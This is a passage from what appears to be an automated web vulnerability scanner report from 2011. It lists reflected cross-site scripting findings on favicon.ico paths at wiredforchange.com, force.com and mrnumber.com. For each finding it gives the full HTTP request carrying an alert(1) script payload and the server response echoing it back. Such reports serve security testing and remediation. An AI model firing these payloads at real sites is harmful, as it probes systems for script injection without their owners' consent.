Severity:   Low
Confidence:   Certain
Host:   http://www.wiredforchange.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload db55a<script>alert(1)</script>474f814857b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wiredforchange.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=db55a<script>alert(1)</script>474f814857b

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:19:18 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: JSESSIONID=8D44C58D1CB471017C4BC3347397E4EA-n2; Path=/
Set-Cookie: SRV=web8; path=/
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>474f814857b'>http://www.google.com/search?hl=en&q=db55a<script>alert(1)</script>474f814857b</a>
...[SNIP]...

3.196. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wiredforchange.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3385'><script>alert(1)</script>af1a8e2a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wiredforchange.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=d3385'><script>alert(1)</script>af1a8e2a429

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:19:18 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: JSESSIONID=1CCA72982385ACE3BA9F512B75E4F7A4-n2; Path=/
Set-Cookie: SRV=web6; path=/
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=d3385'><script>alert(1)</script>af1a8e2a429'>
...[SNIP]...

3.197. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ebaef<script>alert(1)</script>ea50eb48de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?ebaef<script>alert(1)</script>ea50eb48de3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1
Date: Fri, 22 Apr 2011 15:10:29 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1">http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1</a>

3.198. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e1f"><script>alert(1)</script>ca65c1d65e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?e9e1f"><script>alert(1)</script>ca65c1d65e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1
Date: Fri, 22 Apr 2011 15:10:28 GMT
Content-Length: 195

The URL has moved to <a href="http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1">http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1</a>

3.199. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e75d<script>alert(1)</script>165d6b47824 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico7e75d<script>alert(1)</script>165d6b47824 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824
Content-Type: text/html
Content-Length: 262

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824">http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824</a>
...[SNIP]...

3.200. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7e06"><script>alert(1)</script>1c75dad300f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoc7e06"><script>alert(1)</script>1c75dad300f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f
Content-Type: text/html
Content-Length: 266

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f">http://mrnumber.com/favicon.ic
...[SNIP]...

3.201. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bd8"><script>alert(1)</script>35e978e613 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1
Content-Type: text/html
Content-Length: 270

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1">http://mrnumber.com/favicon.
...[SNIP]...

3.202. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 193b8<script>alert(1)</script>9fa070849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?193b8<script>alert(1)</script>9fa070849=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1
Content-Type: text/html
Content-Length: 264

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1">http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1</a>
...[SNIP]...
